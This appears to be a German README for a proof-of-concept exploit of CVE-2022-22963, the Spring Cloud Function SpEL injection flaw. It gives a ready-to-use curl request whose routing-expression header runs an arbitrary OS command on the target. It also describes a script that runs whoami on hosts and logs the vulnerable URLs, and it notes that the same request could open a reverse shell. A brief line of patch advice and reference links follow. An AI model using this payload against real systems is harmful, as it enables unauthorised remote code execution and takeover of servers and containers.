
Proof-of-Concept-Exploit für CVE-2022-22963 (Spring Cloud Function SpEL-Injection) mit Erkennungsskript und curl-basierter RCE-Payload-Erzeugung.
CVE-2022-22963 PoC
Leicht modifiziert für die englische Übersetzung und Erkennung von https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . Standardmäßig wird whoami auf dem Ziel ausgeführt und eine Datei vulnerable.txt mit den URLs erstellt, die anfällig sind.
Das Ausnutzen der Schwachstelle ist recht einfach zu bewerkstelligen. Hier ist der curl-Befehl zum Ausnutzen der Schwachstelle angegeben.
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Mit diesem curl ist es trivial, eine Datei auf dem Betriebssystem zu erstellen, aber es könnte auch verwendet werden, um eine Reverse-Shell auf dem anfälligen Host oder Container zu öffnen.
Wenn Sie von CVE-2022-22963 betroffen sind, sollten Sie die Anwendung auf die neuesten Versionen 3.1.7 und 3.2.3 aktualisieren.
https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52